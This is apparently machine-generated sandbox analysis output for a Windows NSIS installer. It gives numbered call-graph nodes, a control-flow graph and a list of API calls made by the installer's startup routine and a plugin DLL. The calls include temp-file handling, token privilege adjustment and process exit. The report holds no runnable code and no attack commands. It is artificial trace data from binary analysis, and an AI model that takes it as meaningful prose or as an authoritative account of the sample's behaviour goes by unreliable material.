5735->5742 5743 4057cf ShowWindow 5735->5743 5736->5735 5737 405781 ShowWindow ShowWindow 5736->5737 5738 4057ba 5736->5738 5776 404394 SendMessageW 5737->5776 5744 4043c6 8 API calls 5738->5744 5739->5738 5750 405803 SendMessageW 5739->5750 5748 405695 5740->5748 5749 405679 SendMessageW SendMessageW 5740->5749 5751 404338 SendMessageW 5742->5751 5746 4057e1 5743->5746 5747 4057ef 5743->5747 5745 4057c8 5744->5745 5752 405450 24 API calls 5746->5752 5753 404338 SendMessageW 5747->5753 5754 4056a8 5748->5754 5755 40569a SendMessageW 5748->5755 5749->5748 5750->5745 5756 40581c CreatePopupMenu 5750->5756 5751->5738 5752->5747 5753->5739 5758 40435f 18 API calls 5754->5758 5755->5754 5757 40640a 17 API calls 5756->5757 5759 40582c AppendMenuW 5757->5759 5760 4056b8 5758->5760 5761 405849 GetWindowRect 5759->5761 5762 40585c TrackPopupMenu 5759->5762 5763 4056c1 ShowWindow 5760->5763 5764 4056f5 GetDlgItem SendMessageW 5760->5764 5761->5762 5762->5745 5766 405877 5762->5766 5767 4056e4 5763->5767 5768 4056d7 ShowWindow 5763->5768 5764->5745 5765 40571c SendMessageW SendMessageW 5764->5765 5765->5745 5769 405893 SendMessageW 5766->5769 5775 404394 SendMessageW 5767->5775 5768->5767 5769->5769 5770 4058b0 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 5769->5770 5772 4058d5 SendMessageW 5770->5772 5772->5772 5773 4058fe GlobalUnlock SetClipboardData CloseClipboard 5772->5773 5773->5745 5774->5734 5775->5764 5776->5735 5777 401491 5778 405450 24 API calls 5777->5778 5779 401498 5778->5779 5787 401d14 5788 402c1f 17 API calls 5787->5788 5789 401d1b 5788->5789 5790 402c1f 17 API calls 5789->5790 5791 401d27 GetDlgItem 5790->5791 5792 402592 5791->5792 5793 404495 lstrcpynW lstrlenW 5794 403a96 5795 403aa1 5794->5795 5796 403aa5 5795->5796 5797 403aa8 GlobalAlloc 5795->5797 5797->5796 5798 402598 5799 4025c7 5798->5799 5800 4025ac 5798->5800 5802 4025fb 5799->5802 5803 4025cc 5799->5803 5801 402c1f 17 API calls 5800->5801 5810 4025b3 5801->5810 5805 402c41 17 API calls 5802->5805 5804 402c41 17 API calls 5803->5804 5806 4025d3 WideCharToMultiByte lstrlenA 5804->5806 5807 402602 lstrlenW 5805->5807 5806->5810 5807->5810 5808 40262f 5809 402645 5808->5809 5811 405f90 WriteFile 5808->5811 5810->5808 5810->5809 5812 405fbf 5 API calls 5810->5812 5811->5809 5812->5808 5813 40451e 5814 404536 5813->5814 5817 404650 5813->5817 5818 40435f 18 API calls 5814->5818 5815 4046ba 5816 4046c4 GetDlgItem 5815->5816 5819 404784 5815->5819 5820 404745 5816->5820 5821 4046de 5816->5821 5817->5815 5817->5819 5822 40468b GetDlgItem SendMessageW 5817->5822 5823 40459d 5818->5823 5824 4043c6 8 API calls 5819->5824 5820->5819 5825 404757 5820->5825 5821->5820 5829 404704 SendMessageW LoadCursorW SetCursor 5821->5829 5846 404381 EnableWindow 5822->5846 5827 40435f 18 API calls 5823->5827 5828 40477f 5824->5828 5830 40476d 5825->5830 5831 40475d SendMessageW 5825->5831 5833 4045aa CheckDlgButton 5827->5833 5847 4047cd 5829->5847 5830->5828 5836 404773 SendMessageW 5830->5836 5831->5830 5832 4046b5 5837 4047a9 SendMessageW 5832->5837 5844 404381 EnableWindow 5833->5844 5836->5828 5837->5815 5839 4045c8 GetDlgItem 5845 404394 SendMessageW 5839->5845 5841 4045de SendMessageW 5842 404604 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 5841->5842 5843 4045fb GetSysColor 5841->5843 5842->5828 5843->5842 5844->5839 5845->5841 5846->5832 5850 405a14 ShellExecuteExW 5847->5850 5849 404733 LoadCursorW SetCursor 5849->5820 5850->5849 5851 40149e 5852 4014ac PostQuitMessage 5851->5852 5853 4022f7 5851->5853 5852->5853 5854 401c1f 5855 402c1f 17 API calls 5854->5855 5856 401c26 5855->5856 5857 402c1f 17 API calls 5856->5857 5858 401c33 5857->5858 5859 401c48 5858->5859 5860 402c41 17 API calls 5858->5860 5863 402c41 17 API calls 5859->5863 5866 401c58 5859->5866 5860->5859 5861 401c63 5864 402c1f 17 API calls 5861->5864 5862 401caf 5865 402c41 17 API calls 5862->5865 5863->5866 5867 401c68 5864->5867 5868 401cb4 5865->5868 5866->5861 5866->5862 5869 402c1f 17 API calls 5867->5869 5870 402c41 17 API calls 5868->5870 5871 401c74 5869->5871 5872 401cbd FindWindowExW 5870->5872 5873 401c81 SendMessageTimeoutW 5871->5873 5874 401c9f SendMessageW 5871->5874 5875 401cdf 5872->5875 5873->5875 5874->5875 5876 402aa0 SendMessageW 5877 402ac5 5876->5877 5878 402aba InvalidateRect 5876->5878 5878->5877 5879 402821 5880 402827 5879->5880 5881 402ac5 5880->5881 5882 40282f FindClose 5880->5882 5882->5881 5883 4015a3 5884 402c41 17 API calls 5883->5884 5885 4015aa SetFileAttributesW 5884->5885 5886 4015bc 5885->5886 4547 4034a5 SetErrorMode GetVersion 4548 4034e4 4547->4548 4549 4034ea 4547->4549 4550 4067c2 5 API calls 4548->4550 4551 406752 3 API calls 4549->4551 4550->4549 4552 403500 lstrlenA 4551->4552 4552->4549 4553 403510 4552->4553 4554 4067c2 5 API calls 4553->4554 4555 403517 4554->4555 4556 4067c2 5 API calls 4555->4556 4557 40351e 4556->4557 4558 4067c2 5 API calls 4557->4558 4559 40352a #17 OleInitialize SHGetFileInfoW 4558->4559 4637 4063e8 lstrcpynW 4559->4637 4562 403576 GetCommandLineW 4638 4063e8 lstrcpynW 4562->4638 4564 403588 4565 405cea CharNextW 4564->4565 4566 4035ad CharNextW 4565->4566 4567 4036d7 GetTempPathW 4566->4567 4574 4035c6 4566->4574 4639 403474 4567->4639 4569 4036ef 4570 4036f3 GetWindowsDirectoryW lstrcatW 4569->4570 4571 403749 DeleteFileW 4569->4571 4575 403474 12 API calls 4570->4575 4649 402f30 GetTickCount GetModuleFileNameW 4571->4649 4572 405cea CharNextW 4572->4574 4574->4572 4579 4036c0 4574->4579 4581 4036c2 4574->4581 4577 40370f 4575->4577 4576 40375d 4584 405cea CharNextW 4576->4584 4619 403800 4576->4619 4632 403810 4576->4632 4577->4571 4578 403713 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 4577->4578 4582 403474 12 API calls 4578->4582 4579->4567 4735 4063e8 lstrcpynW 4581->4735 4583 403741 4582->4583 4583->4571 4583->4632 4592 40377c 4584->4592 4588 40394a 4590 403952 GetCurrentProcess OpenProcessToken 4588->4590 4591 4039ce ExitProcess 4588->4591 4589 40382a 4747 405a4e 4589->4747 4594 40396a LookupPrivilegeValueW AdjustTokenPrivileges 4590->4594 4595 40399e 4590->4595 4597 403840 4592->4597 4598 4037da 4592->4598 4594->4595 4601 4067c2 5 API calls 4595->4601 4600 4059b9 5 API calls 4597->4600 4602 405dc5 18 API calls 4598->4602 4603 403845 lstrcatW 4600->4603 4604 4039a5 4601->4604 4605 4037e6 4602->4605 4606 403861 lstrcatW lstrcmpiW 4603->4606 4607 403856 lstrcatW 4603->4607 4608 4039ba ExitWindowsEx 4604->4608 4611 4039c7 4604->4611 4605->4632 4736 4063e8 lstrcpynW 4605->4736 4610 40387d 4606->4610 4606->4632 4607->4606 4608->4591 4608->4611 4613 403882 4610->4613 4614 403889 4610->4614 4615 40140b 2 API calls 4611->4615 4612 4037f5 4737 4063e8 lstrcpynW 4612->4737 4617 40591f 4 API calls 4613->4617 4618 40599c 2 API calls 4614->4618 4615->4591 4620 403887 4617->4620 4621 40388e SetCurrentDirectoryW 4618->4621 4679 403ad8 4619->4679 4620->4621 4622 4038a9 4621->4622 4623 40389e 4621->4623 4752 4063e8 lstrcpynW 4622->4752 4751 4063e8 lstrcpynW 4623->4751 4626 40640a 17 API calls 4627 4038e8 DeleteFileW 4626->4627 4628 4038f5 CopyFileW 4627->4628 4634 4038b7 4627->4634 4628->4634 4629 40393e 4631 4061ae 36 API calls 4629->4631 4630 4061ae 36 API calls 4630->4634 4631->4632 4738 4039e6 4632->4738 4633 40640a 17 API calls 4633->4634 4634->4626 4634->4629 4634->4630 4634->4633 4636 403929 CloseHandle 4634->4636 4753 4059d1 CreateProcessW 4634->4753 4636->4634 4637->4562 4638->4564 4640 40667c 5 API calls 4639->4640 4641 403480 4640->4641 4642 40348a 4641->4642 4643 405cbd 3 API calls 4641->4643 4642->4569 4644 403492 4643->4644 4645 40599c 2 API calls 4644->4645 4646 403498 4645->4646 4756 405f0d 4646->4756 4760 405ede GetFileAttributesW CreateFileW 4649->4760 4651 402f73 4678 402f80 4651->4678 4761 4063e8 lstrcpynW 4651->4761 4653 402f96 4654 405d09 2 API calls 4653->4654 4655 402f9c 4654->4655 4762 4063e8 lstrcpynW 4655->4762 4657 402fa7 GetFileSize 4658 4030a8 4657->4658 4676 402fbe 4657->4676 4659 402e8e 32 API calls 4658->4659 4660 4030af 4659->4660 4662 4030eb GlobalAlloc 4660->4662 4660->4678 4764 40345d SetFilePointer 4660->4764 4661 403447 ReadFile 4661->4676 4666 403102 4662->4666 4663 403143 4664 402e8e 32 API calls 4663->4664 4664->4678 4670 405f0d 2 API calls 4666->4670 4667 4030cc 4668 403447 ReadFile 4667->4668 4671 4030d7 4668->4671 4669 402e8e 32 API calls 4669->4676 4672 403113 CreateFileW 4670->4672 4671->4662 4671->4678 4673 40314d 4672->4673 4672->4678 4763 40345d SetFilePointer 4673->4763 4675 40315b 4677 4031d6 44 API calls 4675->4677 4676->4658 4676->4661 4676->4663 4676->4669 4676->4678 4677->4678 4678->4576 4680 4067c2 5 API calls 4679->4680 4681 403aec 4680->4681 4682 403af2 4681->4682 4683 403b04 4681->4683 4773 40632f wsprintfW 4682->4773 4684 4062b6 3 API calls 4683->4684 4685 403b34 4684->4685 4686 403b53 lstrcatW 4685->4686 4688 4062b6 3 API calls 4685->4688 4689 403b02 4686->4689 4688->4686 4765 403dae 4689->4765 4692 405dc5 18 API calls 4693 403b85 4692->4693 4694 403c19 4693->4694 4696 4062b6 3 API calls 4693->4696 4695 405dc5 18 API calls 4694->4695 4697 403c1f 4695->4697 4698 403bb7 4696->4698 4699 403c2f LoadImageW 4697->4699 4702 40640a 17 API calls 4697->4702 4698->4694 4705 403bd8 lstrlenW 4698->4705 4709 405cea CharNextW 4698->4709 4700 403cd5 4699->4700 4701 403c56 RegisterClassW 4699->4701 4704 40140b 2 API calls 4700->4704 4703 403c8c SystemParametersInfoW CreateWindowExW 4701->4703 4734 403cdf 4701->4734 4702->4699 4703->4700 4708 403cdb 4704->4708 4706 403be6 lstrcmpiW 4705->4706 4707 403c0c 4705->4707 4706->4707 4710 403bf6 GetFileAttributesW 4706->4710 4711 405cbd 3 API calls 4707->4711 4714 403dae 18 API calls 4708->4714 4708->4734 4712 403bd5 4709->4712 4713 403c02 4710->4713 4715 403c12 4711->4715 4712->4705 4713->4707 4716 405d09 2 API calls 4713->4716 4717 403cec 4714->4717 4774 4063e8 lstrcpynW 4715->4774 4716->4707 4719 403cf8 ShowWindow 4717->4719 4720 403d7b 4717->4720 4722 406752 3 API calls 4719->4722 4775 405523 OleInitialize 4720->4775 4724 403d10 4722->4724 4723 403d81 4725 403d85 4723->4725 4726 403d9d 4723->4726 4727 403d1e GetClassInfoW 4724->4727 4729 406752 3 API calls 4724->4729 4733 40140b 2 API calls 4725->4733 4725->4734 4728 40140b 2 API calls 4726->4728 4730 403d32 GetClassInfoW RegisterClassW 4727->4730 4731 403d48 DialogBoxParamW 4727->4731 4728->4734 4729->4727 4730->4731 4732 40140b 2 API calls 4731->4732 4732->4734 4733->4734 4734->4632 4735->4579 4736->4612 4737->4619 4739 403a01 4738->4739 4740 4039f7 CloseHandle 4738->4740 4741 403a15 4739->4741 4742 403a0b CloseHandle 4739->4742 4740->4739 4786 403a43 4741->4786 4742->4741 4745 405afa 67 API calls 4746 403819 OleUninitialize 4745->4746 4746->4588 4746->4589 4748 405a63 4747->4748 4749 403838 ExitProcess 4748->4749 4750 405a77 MessageBoxIndirectW 4748->4750 4750->4749 4751->4622 4752->4634 4754 405a10 4753->4754 4755 405a04 CloseHandle 4753->4755 4754->4634 4755->4754 4757 405f1a GetTickCount GetTempFileNameW 4756->4757 4758 405f50 4757->4758 4759 4034a3 4757->4759 4758->4757 4758->4759 4759->4569 4760->4651 4761->4653 4762->4657 4763->4675 4764->4667 4766 403dc2 4765->4766 4782 40632f wsprintfW 4766->4782 4768 403e33 4783 403e67 4768->4783 4770 403b63 4770->4692 4771 403e38 4771->4770 4772 40640a 17 API calls 4771->4772 4772->4771 4773->4689 4774->4694 4776 4043ab SendMessageW 4775->4776 4777 405546 4776->4777 4780 40556d 4777->4780 4781 401389 2 API calls 4777->4781 4778 4043ab SendMessageW 4779 40557f OleUninitialize 4778->4779 4779->4723 4780->4778 4781->4777 4782->4768 4784 40640a 17 API calls 4783->4784 4785 403e75 SetWindowTextW 4784->4785 4785->4771 4787 403a51 4786->4787 4788 403a1a 4787->4788 4789 403a56 FreeLibrary GlobalFree 4787->4789 4788->4745 4789->4788 4789->4789 5887 404ba6 5888 404bd2 5887->5888 5889 404bb6 5887->5889 5891 404c05 5888->5891 5892 404bd8 SHGetPathFromIDListW 5888->5892 5898 405a32 GetDlgItemTextW 5889->5898 5894 404be8 5892->5894 5897 404bef SendMessageW 5892->5897 5893 404bc3 SendMessageW 5893->5888 5895 40140b 2 API calls 5894->5895 5895->5897 5897->5891 5898->5893 5913 4029a8 5914 402c1f 17 API calls 5913->5914 5915 4029ae 5914->5915 5916 4029d5 5915->5916 5917 4029ee 5915->5917 5920 40288b 5915->5920 5921 4029da 5916->5921 5922 4029eb 5916->5922 5918 402a08 5917->5918 5919 4029f8 5917->5919 5924 40640a 17 API calls 5918->5924 5923 402c1f 17 API calls 5919->5923 5927 4063e8 lstrcpynW 5921->5927 5922->5920 5928 40632f wsprintfW 5922->5928 5923->5922 5924->5922 5927->5920 5928->5920 5929 6f9722fd 5930 6f972367 5929->5930 5931 6f972391 5930->5931 5932 6f972372 GlobalAlloc 5930->5932 5932->5930 5933 4028ad 5934 402c41 17 API calls 5933->5934 5936 4028bb 5934->5936 5935 4028d1 5938 405eb9 2 API calls 5935->5938 5936->5935 5937 402c41 17 API calls 5936->5937 5937->5935 5939 4028d7 5938->5939 5961 405ede GetFileAttributesW CreateFileW 5939->5961 5941 4028e4 5942 4028f0 GlobalAlloc 5941->5942 5943 402987 5941->5943 5944 402909 5942->5944 5945 40297e CloseHandle 5942->5945 5946 4029a2 5943->5946 5947 40298f DeleteFileW 5943->5947 5962 40345d SetFilePointer 5944->5962 5945->5943 5947->5946 5949 40290f 5950 403447 ReadFile 5949->5950 5951 402918 GlobalAlloc 5950->5951 5952 402928 5951->5952 5953 40295c 5951->5953 5954 4031d6 44 API calls 5952->5954 5955 405f90 WriteFile 5953->5955 5960 402935 5954->5960 5956 402968 GlobalFree 5955->5956 5957 4031d6 44 API calls 5956->5957 5958 40297b 5957->5958 5958->5945 5959 402953 GlobalFree 5959->5953 5960->5959 5961->5941 5962->5949 5970 401a30 5971 402c41 17 API calls 5970->5971 5972 401a39 ExpandEnvironmentStringsW 5971->5972 5973 401a4d 5972->5973 5975 401a60 5972->5975 5974 401a52 lstrcmpW 5973->5974 5973->5975 5974->5975 5066 402032 5067 402044 5066->5067 5068 4020f6 5066->5068 5069 402c41 17 API calls 5067->5069 5070 401423 24 API calls 5068->5070 5071 40204b 5069->5071 5077 402250 5070->5077 5072 402c41 17 API calls 5071->5072 5073 402054 5072->5073 5074 40206a LoadLibraryExW 5073->5074 5075 40205c GetModuleHandleW 5073->5075 5074->5068 5076 40207b 5074->5076 5075->5074 5075->5076 5089 406831 WideCharToMultiByte 5076->5089 5080 4020c5 5084 405450 24 API calls 5080->5084 5081 40208c 5082 402094 5081->5082 5083 4020ab 5081->5083 5086 401423 24 API calls 5082->5086 5092 6f971777 5083->5092 5085 40209c 5084->5085 5085->5077 5087 4020e8 FreeLibrary 5085->5087 5086->5085 5087->5077 5090 40685b GetProcAddress 5089->5090 5091 402086 5089->5091 5090->5091 5091->5080 5091->5081 5093 6f9717aa 5092->5093 5134 6f971b5f 5093->5134 5095 6f9717b1 5096 6f9718d6 5095->5096 5097 6f9717c2 5095->5097 5098 6f9717c9 5095->5098 5096->5085 5184 6f972352 5097->5184 5168 6f972394 5098->5168 5103 6f9717ee 5104 6f97180f 5103->5104 5105 6f97182d 5103->5105 5197 6f972569 5104->5197 5110 6f971833 5105->5110 5111 6f97187e 5105->5111 5106 6f9717df 5109 6f9717e5 5106->5109 5113 6f9717f0 5106->5113 5107 6f9717f8 5107->5103 5194 6f972d37 5107->5194 5109->5103 5178 6f972aac 5109->5178 5216 6f9715c6 5110->5216 5117 6f972569 10 API calls 5111->5117 5112 6f971815 5208 6f9715b4 5112->5208 5188 6f972724 5113->5188 5118 6f97186f 5117->5118 5125 6f9718c5 5118->5125 5222 6f97252c 5118->5222 5123 6f9717f6 5123->5103 5124 6f972569 10 API calls 5124->5118 5125->5096 5129 6f9718cf GlobalFree 5125->5129 5129->5096 5131 6f9718b1 5131->5125 5226 6f97153d wsprintfW 5131->5226 5132 6f9718aa FreeLibrary 5132->5131 5229 6f97121b GlobalAlloc 5134->5229 5136 6f971b83 5230 6f97121b GlobalAlloc 5136->5230 5138 6f971da9 GlobalFree GlobalFree GlobalFree 5139 6f971dc6 5138->5139 5154 6f971e10 5138->5154 5140 6f972192 5139->5140 5149 6f971ddb 5139->5149 5139->5154 5142 6f9721b4 GetModuleHandleW 5140->5142 5140->5154 5141 6f971c64 GlobalAlloc 5160 6f971b8e 5141->5160 5144 6f9721c5 LoadLibraryW 5142->5144 5145 6f9721da 5142->5145 5143 6f971ccd GlobalFree 5143->5160 5144->5145 5144->5154 5237 6f97161d WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 5145->5237 5146 6f971caf lstrcpyW 5148 6f971cb9 lstrcpyW 5146->5148 5148->5160 5149->5154 5233 6f97122c 5149->5233 5150 6f97222c 5152 6f972239 lstrlenW 5150->5152 5150->5154 5238 6f97161d WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 5152->5238 5153 6f972064 5236 6f97121b GlobalAlloc 5153->5236 5154->5095 5155 6f9721ec 5155->5150 5166 6f972216 GetProcAddress 5155->5166 5156 6f9720ec 5156->5154 5163 6f972134 lstrcpyW 5156->5163 5159 6f972253 5159->5154 5160->5138 5160->5141 5160->5143 5160->5146 5160->5148 5160->5153 5160->5154 5160->5156 5161 6f971d0b 5160->5161 5162 6f971fa5 GlobalFree 5160->5162 5164 6f97122c 2 API calls 5160->5164 5161->5160 5231 6f97158f GlobalSize GlobalAlloc 5161->5231 5162->5160 5163->5154 5164->5160 5166->5150 5167 6f97206d 5167->5095 5175 6f9723ac 5168->5175 5169 6f97122c GlobalAlloc lstrcpynW 5169->5175 5171 6f9724d5 GlobalFree 5172 6f9717cf 5171->5172 5171->5175 5172->5103 5172->5106 5172->5107 5173 6f972454 GlobalAlloc WideCharToMultiByte 5173->5171 5174 6f97247f GlobalAlloc CLSIDFromString 5174->5171 5175->5169 5175->5171 5175->5173 5175->5174 5177 6f97249e 5175->5177 5240 6f9712ba 5175->5240 5177->5171 5244 6f9726b8 5177->5244 5180 6f972abe 5178->5180 5179 6f972b63 CreateFileA 5183 6f972b81 5179->5183 5180->5179 5182 6f972c4d 5182->5103 5247 6f972a56 5183->5247 5185 6f972367 5184->5185 5186 6f9717c8 5185->5186 5187 6f972372 GlobalAlloc 5185->5187 5186->5098 5187->5185 5192 6f972754 5188->5192 5189 6f972802 5191 6f972808 GlobalSize 5189->5191 5193 6f972812 5189->5193 5190 6f9727ef GlobalAlloc 5190->5193 5191->5193 5192->5189 5192->5190 5193->5123 5195 6f972d42 5194->5195 5196 6f972d82 GlobalFree 5195->5196 5251 6f97121b GlobalAlloc 5197->5251 5199 6f97261f lstrcpynW 5205 6f972573 5199->5205 5200 6f97260e StringFromGUID2 5200->5205 5201 6f9725ec MultiByteToWideChar 5201->5205 5202 6f972632 wsprintfW 5202->5205 5203 6f972656 GlobalFree 5203->5205 5204 6f97268b GlobalFree 5204->5112 5205->5199 5205->5200 5205->5201 5205->5202 5205->5203 5205->5204 5206 6f971272 2 API calls 5205->5206 5252 6f9712e1 5205->5252 5206->5205 5256 6f97121b GlobalAlloc 5208->5256 5210 6f9715b9 5211 6f9715c6 2 API calls 5210->5211 5212 6f9715c3 5211->5212 5213 6f971272 5212->5213 5214 6f9712b5 GlobalFree 5213->5214 5215 6f97127b GlobalAlloc lstrcpynW 5213->5215 5214->5118 5215->5214 5217 6f9715ff lstrcpyW 5216->5217 5219 6f9715d2 wsprintfW 5216->5219 5221 6f971618 5217->5221 5219->5221 5221->5124 5223 6f97253a 5222->5223 5224 6f971891 5222->5224 5223->5224 5225 6f972556 GlobalFree 5223->5225 5224->5131 5224->5132 5225->5223 5227 6f971272 2 API calls 5226->5227 5228 6f97155e 5227->5228 5228->5125 5229->5136 5230->5160 5232 6f9715ad 5231->5232 5232->5161 5239 6f97121b GlobalAlloc 5233->5239 5235 6f97123b lstrcpynW 5235->5154 5236->5167 5237->5155 5238->5159 5239->5235 5241 6f9712c1 5240->5241 5242 6f97122c 2 API calls 5241->5242 5243 6f9712df 5242->5243 5243->5175 5245 6f9726c6 VirtualAlloc 5244->5245 5246 6f97271c 5244->5246 5245->5246 5246->5177 5248 6f972a61 5247->5248 5249 6f972a66 GetLastError 5248->5249 5250 6f972a71 5248->5250 5249->5250 5250->5182 5251->5205 5253 6f97130c 5252->5253 5254 6f9712ea 5252->5254 5253->5205 5254->5253 5255 6f9712f0 lstrcpyW 5254->5255 5255->5253 5256->5210 5981 402a35 5982 402c1f 17 API calls 5981->5982 5983 402a3b 5982->5983 5984 402a72 5983->5984 5985 40288b 5983->5985 5987 402a4d 5983->5987 5984->5985 5986 40640a 17 API calls 5984->5986 5986->5985 5987->5985 5989 40632f wsprintfW 5987->5989 5989->5985 5990 401735 5991 402c41 17 API calls 5990->5991 5992 40173c SearchPathW 5991->5992 5993 401757 5992->5993 5995 4029e6 5992->5995 5993->5995 5996 4063e8 lstrcpynW 5993->5996 5996->5995 5997 6f9710e1 5998 6f971111 5997->5998 5999 6f9711d8 GlobalFree 5998->5999 6000 6f9712ba 2 API calls 5998->6000 6001 6f9711d3 5998->6001 6002 6f971272 2 API calls 5998->6002 6003 6f971164 GlobalAlloc 5998->6003 6004 6f9711f8 GlobalFree 5998->6004 6005 6f9712e1 lstrcpyW 5998->6005 6006 6f9711c4 GlobalFree 5998->6006 6000->5998 6001->5999 6002->6006 6003->5998 6004->5998 6005->5998 6006->5998 6007 4014b8 6008 4014be 6007->6008 6009 401389 2 API calls 6008->6009 6010 4014c6 6009->6010 6011 401db9 GetDC 6012 402c1f 17 API calls 6011->6012 6013 401dcb GetDeviceCaps MulDiv ReleaseDC 6012->6013 6014 402c1f 17 API calls 6013->6014 6015 401dfc 6014->6015 6016 40640a 17 API calls 6015->6016 6017 401e39 CreateFontIndirectW 6016->6017 6018 402592 6017->6018 6019 6f97166d 6020 6f971516 GlobalFree 6019->6020 6021 6f971685 6020->6021 6022 6f9716cb GlobalFree 6021->6022 6023 6f9716a0 6021->6023 6024 6f9716b7 VirtualFree 6021->6024 6023->6022 6024->6022 6025 40283b 6026 402843 6025->6026 6027 402847 FindNextFileW 6026->6027 6028 402859 6026->6028 6027->6028 6030 4029e6 6028->6030 6031 4063e8 lstrcpynW 6028->6031 6031->6030

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 0 4034a5-4034e2 SetErrorMode GetVersion 1 4034e4-4034ec call 4067c2 0->1 2 4034f5 0->2 1->2 7 4034ee 1->7 4 4034fa-40350e call 406752 lstrlenA 2->4 9 403510-40352c call 4067c2 * 3 4->9 7->2 16 40353d-40359c #17 OleInitialize SHGetFileInfoW call 4063e8 GetCommandLineW call 4063e8 9->16 17 40352e-403534 9->17 24 4035a6-4035c0 call 405cea CharNextW 16->24 25 40359e-4035a5 16->25 17->16 21 403536 17->21 21->16 28 4035c6-4035cc 24->28 29 4036d7-4036f1 GetTempPathW call 403474 24->29 25->24 30 4035d5-4035d9 28->30 31 4035ce-4035d3 28->31 38 4036f3-403711 GetWindowsDirectoryW lstrcatW call 403474 29->38 39 403749-403763 DeleteFileW call 402f30 29->39 33 4035e0-4035e4 30->33 34 4035db-4035df 30->34 31->30 31->31 36 4036a3-4036b0 call 405cea 33->36 37 4035ea-4035f0 33->37 34->33 52 4036b2-4036b3 36->52 53 4036b4-4036ba 36->53 42 4035f2-4035fa 37->42 43 40360b-403644 37->43 38->39 58 403713-403743 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 403474 38->58 54 403814-403824 call 4039e6 OleUninitialize 39->54 55 403769-40376f 39->55 47 403601 42->47 48 4035fc-4035ff 42->48 49 403661-40369b 43->49 50 403646-40364b 43->50 47->43 48->43 48->47 49->36 57 40369d-4036a1 49->57 50->49 56 40364d-403655 50->56 52->53 53->28 59 4036c0 53->59 75 40394a-403950 54->75 76 40382a-40383a call 405a4e ExitProcess 54->76 60 403804-40380b call 403ad8 55->60 61 403775-403780 call 405cea 55->61 63 403657-40365a 56->63 64 40365c 56->64 57->36 65 4036c2-4036d0 call 4063e8 57->65 58->39 58->54 68 4036d5 59->68 74 403810 60->74 79 403782-4037b7 61->79 80 4037ce-4037d8 61->80 63->49 63->64 64->49 65->68 68->29 74->54 77 403952-403968 GetCurrentProcess OpenProcessToken 75->77 78 4039ce-4039d6 75->78 82 40396a-403998 LookupPrivilegeValueW AdjustTokenPrivileges 77->82 83 40399e-4039ac call 4067c2 77->83 85 4039d8 78->85 86 4039dc-4039e0 ExitProcess 78->86 84 4037b9-4037bd 79->84 87 403840-403854 call 4059b9 lstrcatW 80->87 88 4037da-4037e8 call 405dc5 80->88 82->83 102 4039ba-4039c5 ExitWindowsEx 83->102 103 4039ae-4039b8 83->103 92 4037c6-4037ca 84->92 93 4037bf-4037c4 84->93 85->86 100 403861-40387b lstrcatW lstrcmpiW 87->100 101 403856-40385c lstrcatW 87->101 88->54 99 4037ea-403800 call 4063e8 * 2 88->99 92->84 98 4037cc 92->98 93->92 93->98 98->80 99->60 100->54 105 40387d-403880 100->105 101->100 102->78 106 4039c7-4039c9 call 40140b 102->106 103->102 103->106 108 403882-403887 call 40591f 105->108 109 403889 call 40599c 105->109 106->78 117 40388e-40389c SetCurrentDirectoryW 108->117 109->117 118 4038a9-4038d2 call 4063e8 117->118 119 40389e-4038a4 call 4063e8 117->119 123 4038d7-4038f3 call 40640a DeleteFileW 118->123 119->118 126 403934-40393c 123->126 127 4038f5-403905 CopyFileW 123->127 126->123 129 40393e-403945 call 4061ae 126->129 127->126 128 403907-403927 call 4061ae call 40640a call 4059d1 127->128 128->126 138 403929-403930 CloseHandle 128->138 129->54 138->126
                                                                                                              APIs
                                                                                                              • SetErrorMode.KERNELBASE ref: 004034C8
                                                                                                              • GetVersion.KERNEL32 ref: 004034CE
                                                                                                              • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403501
                                                                                                              • #17.COMCTL32(?,00000006,00000008,0000000A), ref: 0040353E
                                                                                                              • OleInitialize.OLE32(00000000), ref: 00403545
                                                                                                              • SHGetFileInfoW.SHELL32(004216E8,00000000,?,000002B4,00000000), ref: 00403561
                                                                                                              • GetCommandLineW.KERNEL32(00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 00403576
                                                                                                              • CharNextW.USER32(00000000,00435000,00000020,00435000,00000000,?,00000006,00000008,0000000A), ref: 004035AE
                                                                                                                • Part of subcall function 004067C2: GetModuleHandleA.KERNEL32(?,00000020,?,00403517,0000000A), ref: 004067D4
                                                                                                                • Part of subcall function 004067C2: GetProcAddress.KERNEL32(00000000,?), ref: 004067EF
                                                                                                              • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 004036E8
                                                                                                              • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000006,00000008,0000000A), ref: 004036F9
                                                                                                              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 00403705
                                                                                                              • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 00403719
                                                                                                              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 00403721
                                                                                                              • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 00403732
                                                                                                              • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 0040373A
                                                                                                              • DeleteFileW.KERNELBASE(1033,?,00000006,00000008,0000000A), ref: 0040374E
                                                                                                                • Part of subcall function 004063E8: lstrcpynW.KERNEL32(?,?,00000400,00403576,00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 004063F5
                                                                                                              • OleUninitialize.OLE32(00000006,?,00000006,00000008,0000000A), ref: 00403819
                                                                                                              • ExitProcess.KERNEL32 ref: 0040383A
                                                                                                              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,00435000,00000000,00000006,?,00000006,00000008,0000000A), ref: 0040384D
